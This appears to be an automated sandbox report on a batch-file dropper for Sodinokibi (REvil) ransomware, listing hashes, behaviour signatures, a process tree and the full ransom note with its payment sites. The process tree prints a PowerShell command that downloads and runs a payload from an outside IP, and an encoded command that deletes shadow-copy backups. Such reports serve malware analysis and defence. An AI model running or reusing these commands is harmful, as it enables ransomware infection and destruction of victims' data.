Analysis

  • max time kernel
    141s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    05-06-2020 13:10

General

  • Target

    33f14d49b75ebbcfae41baae23087024.bat

  • Size

    215B

  • MD5

    b8e6cda7825e3b0e91da48bf974c6f75

  • SHA1

    c4cda1c0a376e6de07323a2b5d9ff388735dee66

  • SHA256

    4ce493a2f1b9b9fe548d1aa4b4355f76c7ec0c3402da758cdca52288300b6f63

  • SHA512

    3bfad04872fa35e5b1895719cfa2e5b38149c97a623526de13b22d51060831f25371b30e1155512a700ecab4ef809825cd575a2bacd4637ba5d50a86d684dd65

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/33f14d49b75ebbcfae41baae23087024

Extracted

Path

C:\cwea6-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension cwea6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14498A47A6CB5F5F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/14498A47A6CB5F5F Warning: secondary website can be blocked, thats why first variant much better and more available. 3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key gHX8a9HymwxZK/dcld+Od9VQoafo4vD9m/uv5nlJaMy03+bBjV1FLR0xuGiFzjAD H7RFXq/G6vvH7h3BpxdYG65QGJz2YBBmNVZBHdPXhFwcXKa3qmkPNkwx8EAZ6DfZ G9t+E78mHJeoc+3kBL/kIhR7p/PmKfJ9rcj+gISo9R1EKJph1f1m5FVUyM4N/S8T IfKxbWUNuBqg9Pqsu/DR+VM2wvBv2CFmt9NExrtH4I0BYQU0YndhXyh9nkifqpdu HB0enI+XPf0XE37f5IWyTHZZk7NG+LkZih6wFGwOf959tSgW+2vmq2RJ3b00vkMA P3dFnj/s8ppnUJnVHJG4pRvrTSEC0frHE1Qb59M1bsXajnHwUtP32I+SvQcEPrnB neHu8peMYxq8s5D+cIeFRHHzMXu3/LE4egkWn0pRPsBiopuavn0g7vlgnNELkNOr 9Q7s3Y12JJIjz3WWlIOz+9LCpSxsji7KGwXg26wvJ7ykG8BeCZO4ZqjOLIYxD3xZ sN52HX/CKBNKxpjXw8I7VH2fE9kmt6UZ2uUGnhXt8NK730f17URo2nocFwUk7L8i OGpRFgmTdwlO9ovU3fbQFrApbaH8/TE3VDHH54nm8Hr9mLh2yaVpFI/Tf7I1/F2l iTorPqG14vTgKQ9NP4BcoGF02GCtL+AbabbYNFUn0hJmO3uvelgFeEQUAeOz+w4O a0Ayi1rXYK5vt0+t1El8fWZGwgfZ4PgC7/skVNusarjpbti4kMgzrAXvw8TY1Chm RLwtT6emzK4L3f8H4BCsUlTDsuw/ao5dUozucSWBG64cb8IFer9uHkcEmj4f3EfS dLKUtH6jWpJVMrG7kp8g5EH0e6tvKBLrNtXX0gWHEQuoZ4J75O9lBLMWH2qbAZhd cjLlyLijiKZQYni5Rr8dFfiCwqzJHrCwFEeNzX0qBK5ILws/tAvhX/8VF+3ytXEi FpJUxU97S2TdrXK7zMISN5DU3bJb0lQpBRZWF+Zj9eSfFtEtOIN56OYWoly+INAc 0lU6xRjCe/633+j6cjH3mi9YxiZqN+e8Iw0JTxmjB6wtQs1Jm5x+bhrF+t/togjw m7oqQvwFvBRRambT5/UYjXP0EXRDH/zQ7Cw9MK5jRGJqJlBlOdBfAkEagp67K3DL D+F3ZmDkWvJW3J6bEWov8Djm9KBPRvHcSe6b9TESX+hDAKbArJXGyfGUE2/601Xd kVYhMCeA/i6fX4yn/2wB0Si4vjnGtVKedzXF8Kezm/GQruYI2tUZHE80SAmWg+NZ yJq9Dx7UU0XmCgG5hyyVy9llFdb31Aw+Hfzdv7MJ and extension cwea6 When you open our website, put the following data in the input form: Key: gHX8a9HymwxZK/dcld+Od9VQoafo4vD9m/uv5nlJaMy03+bBjV1FLR0xuGiFzjAD H7RFXq/G6vvH7h3BpxdYG65QGJz2YBBmNVZBHdPXhFwcXKa3qmkPNkwx8EAZ6DfZ G9t+E78mHJeoc+3kBL/kIhR7p/PmKfJ9rcj+gISo9R1EKJph1f1m5FVUyM4N/S8T IfKxbWUNuBqg9Pqsu/DR+VM2wvBv2CFmt9NExrtH4I0BYQU0YndhXyh9nkifqpdu HB0enI+XPf0XE37f5IWyTHZZk7NG+LkZih6wFGwOf959tSgW+2vmq2RJ3b00vkMA P3dFnj/s8ppnUJnVHJG4pRvrTSEC0frHE1Qb59M1bsXajnHwUtP32I+SvQcEPrnB neHu8peMYxq8s5D+cIeFRHHzMXu3/LE4egkWn0pRPsBiopuavn0g7vlgnNELkNOr 9Q7s3Y12JJIjz3WWlIOz+9LCpSxsji7KGwXg26wvJ7ykG8BeCZO4ZqjOLIYxD3xZ sN52HX/CKBNKxpjXw8I7VH2fE9kmt6UZ2uUGnhXt8NK730f17URo2nocFwUk7L8i OGpRFgmTdwlO9ovU3fbQFrApbaH8/TE3VDHH54nm8Hr9mLh2yaVpFI/Tf7I1/F2l iTorPqG14vTgKQ9NP4BcoGF02GCtL+AbabbYNFUn0hJmO3uvelgFeEQUAeOz+w4O a0Ayi1rXYK5vt0+t1El8fWZGwgfZ4PgC7/skVNusarjpbti4kMgzrAXvw8TY1Chm RLwtT6emzK4L3f8H4BCsUlTDsuw/ao5dUozucSWBG64cb8IFer9uHkcEmj4f3EfS dLKUtH6jWpJVMrG7kp8g5EH0e6tvKBLrNtXX0gWHEQuoZ4J75O9lBLMWH2qbAZhd cjLlyLijiKZQYni5Rr8dFfiCwqzJHrCwFEeNzX0qBK5ILws/tAvhX/8VF+3ytXEi FpJUxU97S2TdrXK7zMISN5DU3bJb0lQpBRZWF+Zj9eSfFtEtOIN56OYWoly+INAc 0lU6xRjCe/633+j6cjH3mi9YxiZqN+e8Iw0JTxmjB6wtQs1Jm5x+bhrF+t/togjw m7oqQvwFvBRRambT5/UYjXP0EXRDH/zQ7Cw9MK5jRGJqJlBlOdBfAkEagp67K3DL D+F3ZmDkWvJW3J6bEWov8Djm9KBPRvHcSe6b9TESX+hDAKbArJXGyfGUE2/601Xd kVYhMCeA/i6fX4yn/2wB0Si4vjnGtVKedzXF8Kezm/GQruYI2tUZHE80SAmWg+NZ yJq9Dx7UU0XmCgG5hyyVy9llFdb31Aw+Hfzdv7MJ ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14498A47A6CB5F5F

http://decryptor.cc/14498A47A6CB5F5F

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 139 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\33f14d49b75ebbcfae41baae23087024.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/33f14d49b75ebbcfae41baae23087024');Invoke-TOSTCDSD;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Modifies system certificate store
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:1480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1632

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms